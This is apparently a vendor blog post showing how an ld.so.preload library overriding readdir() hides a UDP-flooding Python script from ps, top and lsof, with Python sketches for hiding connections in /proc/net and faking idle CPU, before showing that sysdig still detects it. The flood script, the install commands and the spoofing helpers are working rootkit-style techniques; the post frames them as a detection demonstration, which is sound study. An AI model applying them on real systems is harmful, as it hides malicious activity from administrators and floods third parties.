Introduction
The other day I was looking at the output of top on my machine, and I wondered: how hard would it be to hide specific processes and/or network connections from traditional monitoring tools like ps, top, lsof, …? I decided to kill a couple of hours and try to hack together a solution. In this post, I’ll show you some of the answers I came up with, along with some proof-of-concept code that implements them. I’ll also show that sysdig is not susceptible to my hack, and explain why.
The goal that I want to achieve is to deliberately hide a simple and malicious Python script (I’ll call it evil_script.py) that does some damage to my system, saturating CPU and network by sending UDP packets towards a poor victim:
#!/usr/bin/python
import socket
import sys


def send_traffic(ip, port):
    # Flood the target with small UDP datagrams, forever.
    print("Sending burst to " + ip + ":" + str(port))
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.connect((ip, port))
    while True:
        # A bytes literal works on both Python 2 and Python 3.
        sock.send(b"I AM A BAD BOY")


if len(sys.argv) != 3:
    print("Usage: " + sys.argv[0] + " IP PORT")
    sys.exit()

send_traffic(sys.argv[1], int(sys.argv[2]))

Let’s go!
The Baseline Behavior
I’ll start by running this:
gianluca@sid:~$ ./evil_script.py 1.2.3.4 666
Sending burst to 1.2.3.4:666
If you run it, you’ll see that it quickly saturates your system resources: a perfect use case for starting the analysis. Let’s confirm that the process is there and eating my CPU, using ps:
gianluca@sid:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca 8585 105 0.0 34256 6152 pts/6 R+ 12:03 0:07 /usr/bin/python ./evil_script.py 1.2.3.4 666
...
Yep. I can also look at the network connections opened by the process by using lsof:
gianluca@sid:~$ sudo lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
evil_scri 8290 gianluca 3u IPv4 23936 0t0 UDP 172.16.189.136:33220->1.2.3.4:666
...
So the process is there, generating network activity. If I want to hide this information, the first thing I have to do is understand how ps and similar tools actually extract the information about my process.
How ps works
Tools like ps leverage the /proc file system, a Linux construct that we explained at a high level in a previous post. Let’s dig into the details now using sysdig:
gianluca@sid:~$ sudo sysdig proc.name = ps
...
447463 23:54:12.077878685 2 ps (3214) > openat dirfd=AT_FDCWD name=/proc flags=1089(O_DIRECTORY|O_NONBLOCK|O_RDONLY) mode=0
447465 23:54:12.077880122 2 ps (3214) < openat fd=5(/proc)
447473 23:54:12.077887674 2 ps (3214) > getdents
447486 23:54:12.077988237 2 ps (3214) < getdents
...
452546 23:54:12.082257864 2 ps (3214) > open
452547 23:54:12.082259424 2 ps (3214) < open fd=6(/proc/3174/stat) name=/proc/3174/stat flags=1(O_RDONLY) mode=0
452548 23:54:12.082259730 2 ps (3214) > read fd=6(/proc/3174/stat) size=1024
452549 23:54:12.082262601 2 ps (3214) < read res=322 data=3174 (evil_script.py) R 3089 3174 3089 34816 3174 4202496 1620 0 15 0 8 3474 0 0
452550 23:54:12.082262874 2 ps (3214) > close fd=6(/proc/3174/stat)
452551 23:54:12.082262982 2 ps (3214) < close res=0
452552 23:54:12.082266445 2 ps (3214) > open
452553 23:54:12.082267682 2 ps (3214) < open fd=6(/proc/3174/status) name=/proc/3174/status flags=1(O_RDONLY) mode=0
452554 23:54:12.082268000 2 ps (3214) > read fd=6(/proc/3174/status) size=1024
452555 23:54:12.082274407 2 ps (3214) < read res=854 data=Name:.evil_script.py.State:.R (running).Tgid:.3174.Ngid:.0.Pid:.3174.PPid:.3089.
452556 23:54:12.082274624 2 ps (3214) > close fd=6(/proc/3174/status)
452557 23:54:12.082274724 2 ps (3214) < close res=0
452558 23:54:12.082276935 2 ps (3214) > open
452559 23:54:12.082278171 2 ps (3214) < open fd=6(/proc/3174/cmdline) name=/proc/3174/cmdline flags=1(O_RDONLY) mode=0
452560 23:54:12.082278466 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131072
452561 23:54:12.082280215 2 ps (3214) < read res=46 data=/usr/bin/python../evil_script.py.1.2.3.4.6666.
452562 23:54:12.082280463 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131026
452563 23:54:12.082280814 2 ps (3214) < read res=0 data=
452564 23:54:12.082281083 2 ps (3214) > close fd=6(/proc/3174/cmdline)
452565 23:54:12.082281216 2 ps (3214) < close res=0
This perfectly highlights how ps works: first, the directory /proc is opened via the openat() system call. Then, the process calls getdents() on the opened directory, a system call that returns the list of files and directories contained in a specific directory (/proc in this case). If you’ve ever run ls /proc, you’ve noticed that there is a subdirectory for every running process in the system, and that each one is named after the PID of the process itself. So, ps just grabs the list from getdents(), and then iterates over a fixed set of files in each subdirectory. These files, as you can see from the event list, are named /proc/PID/stat, /proc/PID/status, and /proc/PID/cmdline, and contain all the information that ps shows in its output.
It’s worth noting (as it will be useful in the next section) that ps itself doesn’t directly invoke openat() and getdents(), as those system calls are abstracted by the C standard library (libc). libc provides two functions, opendir() and readdir(), that take care of issuing the system calls themselves, offering a somewhat simpler API to the developer. These are the functions that ps actually calls.
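To make the sequence above concrete, here is a minimal Python 3 sketch of the same walk: list /proc, keep the numeric entries, and read stat and cmdline for each one. It is only an illustration of the idea, not how ps is implemented; the function names and the proc_root parameter are made up for this example. As far as I know, CPython's os.listdir() is itself built on libc's opendir()/readdir() on Linux, which is the same layer discussed above.

```python
import os


def parse_stat_name(stat_text):
    """Return the command name from the contents of /proc/PID/stat.

    The name sits between the first '(' and the last ')', e.g.
    '3174 (evil_script.py) R 3089 ...' gives 'evil_script.py'.
    """
    start = stat_text.index("(") + 1
    end = stat_text.rindex(")")
    return stat_text[start:end]


def list_processes(proc_root="/proc"):
    """Yield (pid, name, cmdline) for every numeric entry under proc_root."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # not a PID directory (e.g. "meminfo", "net")
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "stat"), "rb") as f:
                stat_text = f.read().decode(errors="replace")
            with open(os.path.join(base, "cmdline"), "rb") as f:
                raw = f.read()
        except OSError:
            continue  # the process exited between listing and reading
        # Arguments in cmdline are separated by NUL bytes.
        cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        yield int(entry), parse_stat_name(stat_text), cmdline
```

On a Linux machine, `for pid, name, cmdline in list_processes(): print(pid, name, cmdline)` prints a rough equivalent of a process list. The important point is that everything hinges on the directory listing: an entry that never comes back from the listing is never opened.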
Hiding the process
After this quick digression on how ps works, it seems fairly obvious that if we want to hide our process, we need a way to prevent these tools from accessing the proper files under /proc/PID/. What are the options? There are various methods worth mentioning:
- Using a proper framework: there are a bunch of very good frameworks, like SELinux and Grsecurity that do, among other things, exactly this. In a production system, I would absolutely consider these, although today I want to get my hands dirty and have fun creating something from scratch.
- Modify top/ps/… binaries: I could grab the source code of each of these tools, implement my own “hiding linux processes” logic, recompile, and replace the binaries. Very inefficient and time consuming.
- Modify libc: I could modify the readdir() function inside libc and add code that excludes access to some /proc files. But recompiling libc is a burden, not to mention that the libc code tends to be very hard to understand.
- Modify the system calls in the kernel: This is the most advanced option, and it would work by intercepting and modifying the getdents() system call directly in the kernel with a custom module. It’s definitely tempting, but I won’t follow this route today because I’m already very familiar with how system call interception works in sysdig, so I want to do something new.
I decided to go for an intermediate solution, one that is interesting and simple enough to implement in an hour or so: it’s a variant of “modifying libc” based on a tricky feature offered by the Linux dynamic linker (the component that takes care of loading the various libraries needed by a program at runtime), called preloading.
With preloading, Linux is kind enough to give us the option to load a custom shared library before the other normal system libraries are loaded. This means that, if the custom library exports a function with the same signature as one found in a system library, we are literally able to override it with the custom code in our library, and all dynamically linked processes will automatically pick up our custom one!
This sounds like a solution to my problem, because I could write a very simple custom library that overrides libc’s readdir() and implements the logic to hide the process! The logic is fairly straightforward too: every time I see that the /proc/PID directory (where PID is the PID of the process having the name “evil_script”) is being read, I just block that access in a clean way, thus hiding the entire directory! I went ahead and implemented these thoughts in code. You can get the sources at https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c (it’s actually less than 100 lines of code including comments, so go read it!). Once the code is written, let’s compile it as a shared library, and install it in the system path:
gianluca@sid:~/libprocesshider$ make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/
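Before wiring the library into the system, it may help to see the filtering decision on its own. The following Python 3 sketch models only the logic described above (skip an entry when the directory is /proc, the entry is a PID, and that PID belongs to the process to hide). The real library is written in C and may differ in its details; visible_entries, name_of_pid and the hidden_name default are hypothetical names chosen for this illustration.

```python
def visible_entries(dir_path, entries, name_of_pid, hidden_name="evil_script.py"):
    """Yield the directory entries a hooked readdir() would let through.

    dir_path    -- directory being listed
    entries     -- names the real readdir() would return
    name_of_pid -- callable mapping a PID string to its process name
    hidden_name -- process name to hide (assumed value for this sketch)
    """
    for entry in entries:
        if (dir_path == "/proc" and entry.isdigit()
                and name_of_pid(entry) == hidden_name):
            continue  # swallow this entry, as if the directory did not exist
        yield entry
```

For example, with entries `["1", "3174", "meminfo"]` and a lookup that maps "3174" to "evil_script.py", listing "/proc" yields only "1" and "meminfo", while listing any other directory is left untouched.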
Now, I just need to tell the dynamic linker to actually use it. I want to install it system-wide, so that every new process in the system can pick this up automatically. This is done by simply writing my library path into a configuration file:
root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Done! From this moment on, every new binary that I launch will execute my custom code when iterating through directories via readdir(). So let’s go back and try this by executing ps and lsof while the evil script is running:
gianluca@sid:~$ sudo ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca@sid:~$ sudo lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
It works! My process is now running in invisible mode, even when the tools are run as root. I also repeated this with pstree, top and htop, and none of them were able to show my process anymore.
This is just a simple example, but we could also spoof more information, for example:
- Modify the global CPU usage counters: /proc/stat contains those statistics, so I could intercept all the read operations to that file and return a custom one, faking a 0% global CPU usage.
- Modify the connection list: for example, netstat uses the /proc/net/tcp file to get the list of TCP connections. Just intercept the reads to the file and hide a specific connection.
Good exercises for the reader :)
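As a starting point for those exercises, here is a hedged Python 3 sketch of the two text transformations involved. It only shows what the spoofed file contents could look like; actually intercepting the reads would still have to happen in a preloaded C library. All function names are invented for this example. The address decoding assumes IPv4 and a little-endian host such as x86, and the CPU rewrite assumes the usual column order of the cpu lines (user, nice, system, idle, iowait, irq, softirq, steal, guest, guest_nice).

```python
import socket
import struct


def decode_endpoint(hex_endpoint):
    """Decode 'HEXIP:HEXPORT' as found in /proc/net/tcp (IPv4 only).

    Assumes a little-endian host, where the address is printed as a
    byte-swapped 32-bit hex number.
    """
    hex_ip, hex_port = hex_endpoint.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def hide_connection(table_text, remote_ip, remote_port):
    """Return table_text without rows whose remote endpoint matches."""
    kept = []
    for line in table_text.splitlines():
        fields = line.split()
        # Data rows look like: 'sl: local_address rem_address st ...'
        if len(fields) > 2 and fields[0].endswith(":"):
            if decode_endpoint(fields[2]) == (remote_ip, remote_port):
                continue  # drop the row we want to hide
        kept.append(line)
    return "\n".join(kept) + "\n"


def fake_idle_cpu(stat_text):
    """Return /proc/stat text with all CPU ticks accounted as idle."""
    out = []
    for line in stat_text.splitlines():
        fields = line.split()
        if fields and fields[0].startswith("cpu"):
            ticks = [int(x) for x in fields[1:]]
            # Sum user..steal; guest time is already counted in user/nice.
            total = sum(ticks[:8])
            ticks = [0] * len(ticks)
            ticks[3] = total  # the fourth column is idle
            line = fields[0] + " " + " ".join(str(t) for t in ticks)
        out.append(line)
    return "\n".join(out) + "\n"
```

Since /proc/net/udp uses the same address encoding, `hide_connection(text, "1.2.3.4", 666)` would also apply to the UDP traffic generated by the script in this post. Keeping the total tick count unchanged in fake_idle_cpu is a deliberate choice: tools that compute usage from the difference between two reads would then see only idle time.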
Note that this method won’t work if the binaries are statically linked against libc. I’ve seen some niche distributions extremely focused on security, where all the binaries’ dependencies are statically linked. This has the huge disadvantage that the binaries tend to get pretty big, and shipping an update for a library forces shipping new binaries of every program that depends on it, so it’s usually not done in mainstream distributions.
Sysdig
Let’s see if sysdig can be tricked as well, starting with CPU usage:
gianluca@sid:~$ sudo sysdig -c topprocs_cpu
CPU% Process
------------------------------
99.99% evil_script.py
2.46% sysdig
0.27% java
0.03% sshd
And network activity:
gianluca@sid:~$ sudo sysdig -c topprocs_net
Bytes Process
------------------------------
862.53KB evil_script.py
400B sshd
gianluca@sid:~$ sudo sysdig -c topconns
Bytes Proto Connection
------------------------------
841.79KB udp 172.16.189.136:54241->1.2.3.4:8888
496B tcp 172.16.189.1:57832->172.16.189.136:22
With sysdig, we’re still able to see it all! This is because sysdig doesn’t necessarily rely on /proc to look for system activity (although it uses it if available). Sysdig inspects every system call, and in this data the malicious process is still clearly visible, along with all the resources it uses. Hiding system calls is a much more challenging task that can’t be done in a couple of hours. In fact, sysdig can see everything:
gianluca@sid:~$ sudo sysdig proc.name contains evil_script
261683 19:27:57.433924531 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261684 19:27:57.433930125 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261685 19:27:57.433931321 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261686 19:27:57.433970361 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261687 19:27:57.433975269 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261688 19:27:57.433980600 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261689 19:27:57.433981682 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261690 19:27:57.434022148 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261691 19:27:57.434026297 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
...
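The per-process byte totals shown earlier can be thought of as a sum over events like these. The Python 3 sketch below illustrates that idea by adding up the return values of completed sendto calls, grouped by process name. It is not how sysdig does it (chisels are Lua scripts that work on parsed event fields rather than on text), and the regular expression simply assumes the default output layout seen in this post, with process names that contain no spaces.

```python
import re
from collections import Counter

# Layout assumed from the output above:
# evt.num time cpu proc.name (tid) direction type args
EVENT_RE = re.compile(
    r"^\d+ \S+ \d+ (?P<proc>\S+) \(\d+\) (?P<dir>[<>]) (?P<type>\S+)(?: (?P<args>.*))?$"
)


def bytes_sent_by_process(lines):
    """Sum the res= value of completed sendto events, grouped by process."""
    totals = Counter()
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m or m.group("dir") != "<" or m.group("type") != "sendto":
            continue  # only exit events of sendto carry the byte count
        res = re.search(r"\bres=(-?\d+)", m.group("args") or "")
        if res and int(res.group(1)) > 0:
            totals[m.group("proc")] += int(res.group(1))
    return totals
```

Feeding it the captured lines (for example, from a file saved with shell redirection) returns a Counter keyed by process name. Nothing in this path touches /proc, which is why the readdir() trick has no effect on it.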
As a bonus, sysdig is also showing me that the dynamic linker is loading my custom library before libc. This is what happens when ps executes after the preload change:
gianluca@sid:~$ sudo sysdig proc.name = ps
2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0
...
2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0
2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832
...
2810 00:21:52.721293540 1 ps (3351) > open
2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0
2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832
...
/usr/local/lib/libprocesshider.so is automatically loaded (with open() and read()) before /lib/x86_64-linux-gnu/libc.so.6, without having to change the ps code or the libc code.
In theory, I could have used strace/ltrace to attach to the process and see what it was doing in a similar way, but remember that I completely hid the malicious process’s PID from /proc, so how would we find it? Those tools need the exact PID in order to attach. I could have brute-forced the entire PID range, but that doesn’t seem like a very attractive alternative. Also, those tools just provide a flat list of events, whereas sysdig, with chisels, can aggregate the events and show me exactly what I care about (in this case CPU/network consumption).
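For completeness, the brute-force idea mentioned above could look roughly like the following Python 3 sketch: compare what the directory listing returns with what can be reached by opening /proc/PID/status directly. The function names and the injectable listdir parameter are assumptions made for this example. One detail matters here: thread IDs are reachable as /proc/TID even though they are never listed in /proc, so the sketch only reports IDs whose Tgid equals the ID itself.

```python
import os


def read_tgid(pid, proc_root="/proc"):
    """Return the Tgid recorded in proc_root/PID/status, or None if unreadable."""
    try:
        with open(os.path.join(proc_root, str(pid), "status")) as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except (OSError, ValueError):
        pass
    return None


def find_hidden_pids(max_pid, proc_root="/proc", listdir=os.listdir):
    """Return PIDs reachable by direct path but absent from the listing."""
    listed = {int(e) for e in listdir(proc_root) if e.isdigit()}
    hidden = []
    for pid in range(1, max_pid + 1):
        if pid in listed:
            continue
        # Skip plain threads: only thread-group leaders have Tgid == PID.
        if read_tgid(pid, proc_root) == pid:
            hidden.append(pid)
    return hidden
```

The upper bound can be read from /proc/sys/kernel/pid_max. A process that starts between the listing and the probe would show up as a false positive, so any hit is worth checking a second time, and the scan is as slow and unattractive as the paragraph above suggests.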
Final notes
As one last consideration, it’s worth clarifying that although it might be possible to get your machine compromised in this exact way (I know there are rootkits out there that rely on this easy and effective method), that is certainly not the point of this post. I just enjoyed it as a thought experiment, and hopefully this demonstrates a simple and powerful method that can be used by application developers to solve real problems in certain circumstances. I think this also proves that system usage can be monitored from different perspectives, and that getting data from system calls can be as good as extracting it from the /proc file system. And at the end of the day, I think we’re all very lucky to have Linux and the /proc file system with its useful metrics exported in plain-text files, ready to be read and inspected without any custom tools!
As always, we’d love to hear from you. If you have any thoughts or questions, please let us know in the comments or on @sysdig. Thanks!